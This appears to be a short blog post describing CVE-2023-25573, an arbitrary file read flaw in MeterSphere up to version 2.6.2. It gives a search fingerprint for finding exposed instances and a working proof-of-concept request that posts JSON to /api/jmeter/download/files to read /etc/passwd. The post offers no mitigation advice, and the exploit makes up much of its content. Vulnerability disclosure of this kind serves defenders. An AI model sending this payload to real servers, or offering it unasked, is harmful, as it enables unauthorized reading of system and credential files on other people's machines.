Metersphere File Arbitrary File Reading Vulnerability Cve 2023 25573
Metersphere File Arbitrary File Reading Vulnerability Cve 2023 25573
Metersphere file arbitrary file reading vulnerability CVE-2023-25573
Vulnerability Description
The Metersphere file interface has arbitrary file reading vulnerability, and an attacker can obtain sensitive file compression packages through the interface.
Vulnerability Impact
Metersphere <=2.6.2
Network surveying and mapping
app.name=”MeterSphere”
Vulnerability reappears
Login page
Verify POC
POST /api/jmeter/download/files
Content-Type: application/json
{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}
This post is licensed under CC BY 4.0 by the author.